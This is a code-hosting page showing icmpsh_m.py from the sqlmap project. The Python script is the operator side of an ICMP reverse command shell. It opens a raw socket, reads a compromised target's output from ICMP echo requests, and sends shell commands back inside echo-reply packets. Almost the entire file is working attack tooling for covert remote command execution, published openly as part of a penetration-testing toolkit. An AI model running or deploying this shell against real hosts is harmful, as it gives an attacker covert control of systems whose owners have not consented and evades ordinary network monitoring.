Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
sqlmapproject
GitHub Repository: sqlmapproject/sqlmap
 Path: blob/master/extra/icmpsh/icmpsh_m.py
2992 views
1
#!/usr/bin/env python

2
#

3
#  icmpsh - simple icmp command shell (port of icmpsh-m.pl written in

4
#  Perl by Nico Leidecker <[email protected]>)

5
#

6
#  Copyright (c) 2010, Bernardo Damele A. G. <[email protected]>

7
#

8
#

9
#  This program is free software: you can redistribute it and/or modify

10
#  it under the terms of the GNU General Public License as published by

11
#  the Free Software Foundation, either version 3 of the License, or

12
#  (at your option) any later version.

13
#

14
#  This program is distributed in the hope that it will be useful,

15
#  but WITHOUT ANY WARRANTY; without even the implied warranty of

16
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the

17
#  GNU General Public License for more details.

18
#

19
#  You should have received a copy of the GNU General Public License

20
#  along with this program.  If not, see <http://www.gnu.org/licenses/>.

21


22
import os

23
import select

24
import socket

25
import sys

26


27
def setNonBlocking(fd):

28
    """

29
    Make a file descriptor non-blocking

30
    """

31


32
    import fcntl

33


34
    flags = fcntl.fcntl(fd, fcntl.F_GETFL)

35
    flags = flags | os.O_NONBLOCK

36
    fcntl.fcntl(fd, fcntl.F_SETFL, flags)

37


38
def main(src, dst):

39
    if sys.platform == "nt":

40
        sys.stderr.write('icmpsh master can only run on Posix systems\n')

41
        sys.exit(255)

42


43
    try:

44
        from impacket import ImpactDecoder

45
        from impacket import ImpactPacket

46
    except ImportError:

47
        sys.stderr.write('You need to install Python Impacket library first\n')

48
        sys.exit(255)

49


50
    # Make standard input a non-blocking file

51
    stdin_fd = sys.stdin.fileno()

52
    setNonBlocking(stdin_fd)

53


54
    # Open one socket for ICMP protocol

55
    # A special option is set on the socket so that IP headers are included

56
    # with the returned data

57
    try:

58
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)

59
    except socket.error:

60
        sys.stderr.write('You need to run icmpsh master with administrator privileges\n')

61
        sys.exit(1)

62


63
    sock.setblocking(0)

64
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

65


66
    # Create a new IP packet and set its source and destination addresses

67
    ip = ImpactPacket.IP()

68
    ip.set_ip_src(src)

69
    ip.set_ip_dst(dst)

70


71
    # Create a new ICMP packet of type ECHO REPLY

72
    icmp = ImpactPacket.ICMP()

73
    icmp.set_icmp_type(icmp.ICMP_ECHOREPLY)

74


75
    # Instantiate an IP packets decoder

76
    decoder = ImpactDecoder.IPDecoder()

77


78
    while True:

79
        try:

80
            cmd = ''

81


82
            # Wait for incoming replies

83
            if sock in select.select([sock], [], [])[0]:

84
                buff = sock.recv(4096)

85


86
                if 0 == len(buff):

87
                    # Socket remotely closed

88
                    sock.close()

89
                    sys.exit(0)

90


91
                # Packet received; decode and display it

92
                ippacket = decoder.decode(buff)

93
                icmppacket = ippacket.child()

94


95
                # If the packet matches, report it to the user

96
                if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type():

97
                    # Get identifier and sequence number

98
                    ident = icmppacket.get_icmp_id()

99
                    seq_id = icmppacket.get_icmp_seq()

100
                    data = icmppacket.get_data_as_string()

101


102
                    if len(data) > 0:

103
                        sys.stdout.write(data)

104


105
                    # Parse command from standard input

106
                    try:

107
                        cmd = sys.stdin.readline()

108
                    except:

109
                        pass

110


111
                    if cmd == 'exit\n':

112
                        return

113


114
                    # Set sequence number and identifier

115
                    icmp.set_icmp_id(ident)

116
                    icmp.set_icmp_seq(seq_id)

117


118
                    # Include the command as data inside the ICMP packet

119
                    icmp.contains(ImpactPacket.Data(cmd))

120


121
                    # Calculate its checksum

122
                    icmp.set_icmp_cksum(0)

123
                    icmp.auto_checksum = 1

124


125
                    # Have the IP packet contain the ICMP packet (along with its payload)

126
                    ip.contains(icmp)

127


128
                    try:

129
                        # Send it to the target host

130
                        sock.sendto(ip.get_packet(), (dst, 0))

131
                    except socket.error as ex:

132
                        sys.stderr.write("'%s'\n" % ex)

133
                        sys.stderr.flush()

134
        except:

135
            break

136


137
if __name__ == '__main__':

138
    if len(sys.argv) < 3:

139
        msg = 'missing mandatory options. Execute as root:\n'

140
        msg += './icmpsh-m.py <source IP address> <destination IP address>\n'

141
        sys.stderr.write(msg)

142
        sys.exit(1)

143


144
    main(sys.argv[1], sys.argv[2])

145


146